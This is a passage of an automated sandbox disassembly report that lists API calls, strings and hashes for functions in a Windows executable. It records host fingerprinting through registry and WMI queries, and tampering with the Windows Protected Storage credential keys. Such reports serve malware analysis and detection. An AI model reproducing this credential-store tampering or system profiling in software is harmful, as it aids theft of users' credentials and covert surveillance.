                                                                                              • API ID: CloseMessageOpenParentValue_rand_strncpy
                                                                                              • String ID: ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Windows 2000 Professional$Windows 3.1$Windows 95$Windows 98$Windows Me$Windows NT 3.5$Windows NT 4.0$Windows Server 2003$Windows Server 2008$Windows Sever 2000$Windows Vista$Windows XP Home Edition$Windows XP Professional
                                                                                              • API String ID: 259016058-1574738584
                                                                                              • Opcode ID: d4a387fc0c1b000aa3560587b30e8cf3f5790bc05cc8cfac1ab569a616065950
                                                                                              • Instruction ID: 6947d528358f3abf9f61610de5f967e2356a8112bdea7af398e2d87693c0fe26
                                                                                              • Opcode Fuzzy Hash: d4a387fc0c1b000aa3560587b30e8cf3f5790bc05cc8cfac1ab569a616065950
                                                                                              • Instruction Fuzzy Hash: 858192712087019BC314DF28D996F5BB3A4EFC4719F104A1EF4966B2D2DA78A80DCB67
                                                                                              APIs
                                                                                              • GetSystemMenu.USER32(?,00000000), ref: 0043AEE8
                                                                                              • AppendMenuA.USER32(?,00000800,00000000,00000000), ref: 0043AF51
                                                                                              • AppendMenuA.USER32(?,00000000,00000010,00000010), ref: 0043AF5C
                                                                                              • SendMessageA.USER32(?,00000080,00000001,?), ref: 0043AF9C
                                                                                              • SendMessageA.USER32(?,00000080,00000000,?), ref: 0043AFAD
                                                                                              • GetVersionExA.KERNEL32 ref: 0043B067
                                                                                              • SendMessageA.USER32(?,00001309,00000000,00000000), ref: 0043B147
                                                                                              • GetClientRect.USER32(?,?), ref: 0043B1E6
                                                                                                • Part of subcall function 004021B0: FindResourceA.KERNEL32(00000000,?,00000006), ref: 004021CA
                                                                                                • Part of subcall function 00459A51: SetWindowPos.USER32(?,000000FF,?,?,?,?,8rE,?,00457238,00000000,?,?,000000FF,000000FF,00000015), ref: 00459A77
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                                                                              Similarity
                                                                                              • API ID: MenuMessageSend$Append$ClientFindRectResourceSystemVersionWindow
                                                                                              • String ID: (TRIAL)$Disk$MAC Addr$Name$OS:WIN2000$OS:WIN95$OS:WIN98$OS:WINNT$System1$System2$Unknown OS!!
                                                                                              • API String ID: 2761810206-2538934281
                                                                                              • Opcode ID: 456dd4ae6cbf86949a8a9846d028dfff195fd231771f08457c1837c9d0f39645
                                                                                              • Instruction ID: 28d43a913e9cc64de2e3d69b6c2acafb16c2cec924d16276a36815c0c13835ca
                                                                                              • Opcode Fuzzy Hash: 456dd4ae6cbf86949a8a9846d028dfff195fd231771f08457c1837c9d0f39645
                                                                                              • Instruction Fuzzy Hash: 55E1AB70344701ABD714CB24CC99F6BB7A5BB88704F148A1DF6999B3C2DB74E806CB99
                                                                                              APIs
                                                                                                • Part of subcall function 00460C65: __EH_prolog.LIBCMT ref: 00460C6A
                                                                                              • CallNextHookEx.USER32(?,00000003,?,?), ref: 004588E9
                                                                                              • GetClassLongA.USER32(?,000000E6), ref: 0045892E
                                                                                              • GlobalGetAtomNameA.KERNEL32(?,?,00000005,?,?,Function_0005EC43), ref: 0045895A
                                                                                              • lstrcmpiA.KERNEL32(?,ime), ref: 00458969
                                                                                              • SetWindowLongA.USER32(?,000000FC,Function_00057E4D), ref: 004589A3
                                                                                              • CallNextHookEx.USER32(?,00000003,?,?), ref: 00458AA7
                                                                                              • UnhookWindowsHookEx.USER32(?), ref: 00458AB8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                                                                              Similarity
                                                                                              • API ID: Hook$CallLongNext$AtomClassGlobalH_prologNameUnhookWindowWindowslstrcmpi
                                                                                              • String ID: #32768$AfxOldWndProc423$ime
                                                                                              • API String ID: 3204395069-4034971020
                                                                                              • Opcode ID: b744e14381c748edc6cb2f3dde0798086747d9b54c23ed16838e655696a45219
                                                                                              • Instruction ID: c31b28fc186431055d90b645be9d6e60fd1338abb9f4e3e990662555ef10b02e
                                                                                              • Opcode Fuzzy Hash: b744e14381c748edc6cb2f3dde0798086747d9b54c23ed16838e655696a45219
                                                                                              • Instruction Fuzzy Hash: 7851A131504215ABDF11AF50DC48B9E3B75AF04362F14816BFD18E62A2DF789E44CB99
                                                                                              APIs
                                                                                              • RegOpenKeyExA.KERNEL32 ref: 00436BD0
                                                                                              • RegQueryValueExA.KERNEL32(?,ProductName,00000000,00000000,?,?), ref: 00436C9B
                                                                                              • RegQueryValueExA.KERNEL32(?,CSDVersion,00000000,00000000,?,80000002), ref: 00436CBB
                                                                                              • RegQueryValueExA.KERNEL32(?,BuildLab,00000000,00000000,?,?), ref: 00436CDB
                                                                                              • RegQueryValueExA.KERNEL32(?,RegisteredOwner,00000000,00000000,?,?), ref: 00436CFB
                                                                                              • RegQueryValueExA.KERNEL32(?,RegisteredOrganization,00000000,00000000,?,00000000), ref: 00436D1B
                                                                                              • RegQueryValueExA.KERNEL32(?,ProductId,00000000,00000000,?,?), ref: 00436D3B
                                                                                              • RegCloseKey.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00436DE6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                                                                              Similarity
                                                                                              • API ID: QueryValue$CloseOpen
                                                                                              • String ID: BuildLab$CSDVersion$ProductId$ProductName$RegisteredOrganization$RegisteredOwner$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                              • API String ID: 1586453840-3514816458
                                                                                              • Opcode ID: a23dedceb0709ab06c998942d328721647c64ebb905cba96a9fea81f01879b03
                                                                                              • Instruction ID: e5fba20e6ff125bba2283bc3006cd0e19e9b6b9096beb30a0a4ca32c458e7ecf
                                                                                              • Opcode Fuzzy Hash: a23dedceb0709ab06c998942d328721647c64ebb905cba96a9fea81f01879b03
                                                                                              • Instruction Fuzzy Hash: 55718D71108741AFD724DF14CC55F9BB3E8EBC8714F008A2EB199971D1EBB4A509CB96
                                                                                              APIs
                                                                                                • Part of subcall function 0045982D: GetWindowLongA.USER32(?,000000F0), ref: 00459838
                                                                                              • GetParent.USER32(?), ref: 004570B5
                                                                                              • SendMessageA.USER32(00000000,0000036B,00000000,00000000), ref: 004570D8
                                                                                              • GetWindowRect.USER32(?,?), ref: 004570F1
                                                                                              • GetWindowLongA.USER32(00000000,000000F0), ref: 00457104
                                                                                              • CopyRect.USER32(?,?), ref: 00457151
                                                                                              • CopyRect.USER32(?,?), ref: 0045715B
                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00457164
                                                                                                • Part of subcall function 0043D078: MonitorFromWindow.USER32(00000002,00000000), ref: 0043D08D
                                                                                                • Part of subcall function 0043D0E3: GetMonitorInfoA.USER32(00000002,00000000), ref: 0043D0F8
                                                                                              • CopyRect.USER32(?,?), ref: 00457180
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                                                                              Similarity
                                                                                              • API ID: RectWindow$Copy$LongMonitor$FromInfoMessageParentSend
                                                                                              • String ID: ($@
                                                                                              • API String ID: 1450647913-1311469180
                                                                                              • Opcode ID: 11ece05fcfe3392379b065859adf182a91a3234133933bd66773f20962e9c44d
                                                                                              • Instruction ID: f9aac2a8b0235c18acd1f2551889d6b630a400b2f47a5db2de4d24cadace4ab8
                                                                                              • Opcode Fuzzy Hash: 11ece05fcfe3392379b065859adf182a91a3234133933bd66773f20962e9c44d
                                                                                              • Instruction Fuzzy Hash: 19519471904608AFCB10DBB8DC85EEEBBB9AF44311F144166F901F7281EA34EC098B68
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(00000008,?), ref: 0040140A
                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00401411
                                                                                              • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000), ref: 0040142A
                                                                                              • GetLastError.KERNEL32 ref: 00401430
                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401455
                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 0040145E
                                                                                              • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,?), ref: 00401474
                                                                                              • GetLengthSid.ADVAPI32 ref: 00401481
                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040148C
                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 0040148F
                                                                                              • CopySid.ADVAPI32(00000000,00000000), ref: 004014A1
                                                                                              • GetProcessHeap.KERNEL32(00000000), ref: 004014B0
                                                                                              • HeapFree.KERNEL32(00000000), ref: 004014B3
                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004014C8
                                                                                              • HeapFree.KERNEL32(00000000), ref: 004014CB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                                                                              Similarity
                                                                                              • API ID: Heap$Process$Token$AllocFreeInformation$CopyCurrentErrorLastLengthOpen
                                                                                              • String ID:
                                                                                              • API String ID: 4067104921-0
                                                                                              • Opcode ID: 6b90823c6b706cc8d65496f5219d6948ff2a4456f403bc18005a6de8c253be82
                                                                                              • Instruction ID: be5dff9eabe861d766ec5fd4dd401e50df9c5d4daca625da32615f9425814a56
                                                                                              • Opcode Fuzzy Hash: 6b90823c6b706cc8d65496f5219d6948ff2a4456f403bc18005a6de8c253be82
                                                                                              • Instruction Fuzzy Hash: 92216771200305ABD720AB71EC89F6B77ACEB84B55F004439F944C6290EAB4DC45C7BA
                                                                                              APIs
                                                                                                • Part of subcall function 004306A0: RegOpenKeyExA.KERNEL32(80000002,80000002,00000000,000F003F,?,?,00402ED4,80000002,SOFTWARE\Microsoft\Internet Explorer\Registration), ref: 004306B5
                                                                                                • Part of subcall function 004306A0: GetLastError.KERNEL32(?,00402ED4,80000002,SOFTWARE\Microsoft\Internet Explorer\Registration), ref: 004306BF
                                                                                              • CoCreateInstance.OLE32 ref: 0042B6F9
                                                                                              • VariantInit.OLEAUT32(?), ref: 0042B835
                                                                                                • Part of subcall function 00456F8E: MessageBoxA.USER32(?,?,?,?), ref: 00456FB6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateErrorInitInstanceLastMessageOpenVariant
                                                                                              • String ID: Couldn't connect to service$Domain$Instantiation of IWbemLocator failed$NV Hostname$Query failed$SELECT * FROM Win32_ComputerSystem WHERE Name="$System\CurrentControlSet\Services\Tcpip\Parameters$WQL$root\cimv2
                                                                                              • API String ID: 3264900959-945420370
                                                                                              • Opcode ID: 91d881ce3ac4bc71bd9289584d48d08c439b38d8dd9c1fcc01c3be25e2c58784
                                                                                              • Instruction ID: e19c71c077be67fb10b829806df480d9e94b8e638e4d3a62bd1a267aacc894f3
                                                                                              • Opcode Fuzzy Hash: 91d881ce3ac4bc71bd9289584d48d08c439b38d8dd9c1fcc01c3be25e2c58784
                                                                                              • Instruction Fuzzy Hash: AFC191B02083809FD310DB69C885F6FB7E9AFC4318F544A1EF19987292D7789849CB5B
                                                                                              APIs
                                                                                                • Part of subcall function 00401370: GetVersionExA.KERNEL32 ref: 004013AC
                                                                                                • Part of subcall function 00401370: GetVersionExA.KERNEL32(?), ref: 004013BF
                                                                                              • SHDeleteKeyA.SHLWAPI(80000001,?,?,?,?,Software\Microsoft\Protected Storage System Provider\,00000035), ref: 00404DCC
                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,?,Software\Microsoft\Protected Storage System Provider\,00000035), ref: 00404DDD
                                                                                              • HeapFree.KERNEL32(00000000), ref: 00404DE4
                                                                                                • Part of subcall function 004012E0: GetVersionExA.KERNEL32 ref: 0040131C
                                                                                                • Part of subcall function 004012E0: GetVersionExA.KERNEL32(?), ref: 0040132F
                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00404E12
                                                                                              • HeapFree.KERNEL32(00000000), ref: 00404E19
                                                                                                • Part of subcall function 00401860: RegOpenKeyExA.ADVAPI32(?,?,00000000,00040000,?), ref: 00401894
                                                                                                • Part of subcall function 00401860: RegSetKeySecurity.ADVAPI32(?,00000004,?), ref: 004018AA
                                                                                                • Part of subcall function 00401860: RegCloseKey.ADVAPI32(?), ref: 004018C9
                                                                                                • Part of subcall function 00401860: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004018E0
                                                                                                • Part of subcall function 00401860: RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 0040190E
                                                                                                • Part of subcall function 00401860: RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000105), ref: 0040194C
                                                                                              • GetUserNameA.ADVAPI32(?,?), ref: 00404E58
                                                                                              • SHDeleteKeyA.SHLWAPI(80000002,?,\Data\e161255a-37c3-11d2-bcaa-00c04fd929db,0000002A,?,?,Software\Microsoft\Protected Storage System Provider\,00000035), ref: 00404EAD
                                                                                              Strings
                                                                                              • \e161255a-37c3-11d2-bcaa-00c04fd929db, xrefs: 00404DA0
                                                                                              • Software\Microsoft\Protected Storage System Provider\, xrefs: 00404CFD, 00404E60
                                                                                              • \Data, xrefs: 00404D7B
                                                                                              • \Data\e161255a-37c3-11d2-bcaa-00c04fd929db, xrefs: 00404E95
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                                                                              Similarity
                                                                                              • API ID: HeapVersion$DeleteFreeOpenProcess$CloseEnumInfoNameQuerySecurityUser
                                                                                              • String ID: Software\Microsoft\Protected Storage System Provider\$\Data$\Data\e161255a-37c3-11d2-bcaa-00c04fd929db$\e161255a-37c3-11d2-bcaa-00c04fd929db
                                                                                              • API String ID: 76489323-2944829630
                                                                                              • Opcode ID: c252d06217ff17f3d4f9251d05438e285e58edb30c13b934adffffeaa3b05065
                                                                                              • Instruction ID: 77fd4bca92202b6cf2dab01a516e43f9aa8c3c24651323e1d72e56862fef26ee
                                                                                              • Opcode Fuzzy Hash: c252d06217ff17f3d4f9251d05438e285e58edb30c13b934adffffeaa3b05065
                                                                                              • Instruction Fuzzy Hash: CE7180712043019FD314EF61C859FABB7A8FBC4744F04492DF545972E1EBB8A909CB9A
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00455F60
                                                                                              • FindResourceA.KERNEL32(?,00000000,00000005), ref: 00455F98
                                                                                              • LoadResource.KERNEL32(?,00000000), ref: 00455FA0
                                                                                                • Part of subcall function 00457843: UnhookWindowsHookEx.USER32(?), ref: 00457868
                                                                                              • LockResource.KERNEL32(00000000), ref: 00455FB2
                                                                                              • GetDesktopWindow.USER32 ref: 00455FDF
                                                                                              • IsWindowEnabled.USER32(00000000), ref: 00455FED
                                                                                              • EnableWindow.USER32(00000000,00000000), ref: 00455FFC
                                                                                              • EnableWindow.USER32(00000000,00000001), ref: 0045608B
                                                                                              • GetActiveWindow.USER32 ref: 00456096
                                                                                              • SetActiveWindow.USER32(00000000), ref: 004560A4
                                                                                              • FreeResource.KERNEL32(00000000), ref: 004560C0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Resource$ActiveEnable$DesktopEnabledFindFreeH_prologHookLoadLockUnhookWindows
                                                                                              • String ID:
                                                                                              • API String ID: 833315621-0
                                                                                              • Opcode ID: 06b7fb4a99dd4ef476a30b6c5874a4420647a7562e42e7a2b9a386645e9465a3
                                                                                              • Instruction ID: 2a4ce187d4919ba72b0d1d9773206bd8c7ff34da06ea6e71cf98739f74d54366
                                                                                              • Opcode Fuzzy Hash: 06b7fb4a99dd4ef476a30b6c5874a4420647a7562e42e7a2b9a386645e9465a3
                                                                                              • Instruction Fuzzy Hash: 09418331500705DBCF20AFA5D94976FBBB5AF0471AF50042FE902622E2DBB85949CB5A
                                                                                              APIs
                                                                                              • SendMessageA.USER32(?,00000143,00000000,?), ref: 0043518C
                                                                                              • RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020019,?), ref: 0043520B
                                                                                              • SendMessageA.USER32(?,0000014E,FFFFFFFF,00000000), ref: 0043545D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Open
                                                                                              • String ID: ($)$0000$Default$SYSTEM\CurrentControlSet\Control\Keyboard Layouts\$SYSTEM\CurrentControlSet\Control\Nls\Language
                                                                                              • API String ID: 1554988408-487650185
                                                                                              • Opcode ID: e2043e2506104ae5d6c811f734f8f202e9f768df778a98a85b5ff77156bb7f8c
                                                                                              • Instruction ID: c4091e44bddb758ac13fe4f631b60d438c76e1330555841b1ac334d37b406dde
                                                                                              • Opcode Fuzzy Hash: e2043e2506104ae5d6c811f734f8f202e9f768df778a98a85b5ff77156bb7f8c
                                                                                              • Instruction Fuzzy Hash: 49B1BF70204B418FD714CF28C885B9AB3E1BF99324F148B5DF8A98B2D5DB74E805CB96
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00458761
                                                                                              • GetPropA.USER32(?,AfxOldWndProc423), ref: 00458779
                                                                                              • CallWindowProcA.USER32(?,?,00000110,?,00000000), ref: 004587D7
                                                                                                • Part of subcall function 00457CE7: GetWindowRect.USER32(?,?), ref: 00457D0C
                                                                                                • Part of subcall function 00457CE7: GetWindow.USER32(?,00000004), ref: 00457D29
                                                                                              • SetWindowLongA.USER32(?,000000FC,?), ref: 00458807
                                                                                              • RemovePropA.USER32(?,AfxOldWndProc423), ref: 0045880F
                                                                                              • GlobalFindAtomA.KERNEL32(AfxOldWndProc423), ref: 00458816
                                                                                              • GlobalDeleteAtom.KERNEL32(00000000), ref: 0045881D
                                                                                                • Part of subcall function 00456D25: GetWindowRect.USER32(?,753BFA40), ref: 00456D31
                                                                                              • CallWindowProcA.USER32(?,?,?,?,00000000), ref: 00458871
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prologLongRemove
                                                                                              • String ID: AfxOldWndProc423
                                                                                              • API String ID: 2397448395-1060338832
                                                                                              • Opcode ID: ee32eedb63964a5dd1226f40263de8d8339820295a72ce44033982a908a94c62
                                                                                              • Instruction ID: ca612bbd6e85d40e054d0ae89126da5a4b03999a9a8927983b9c67bc9c87c1df
                                                                                              • Opcode Fuzzy Hash: ee32eedb63964a5dd1226f40263de8d8339820295a72ce44033982a908a94c62
                                                                                              • Instruction Fuzzy Hash: 6D31A032800209BBCB01AFA5ED49DBF7B79EF49312F00042EF902B1162DB785914DB6A
                                                                                              APIs
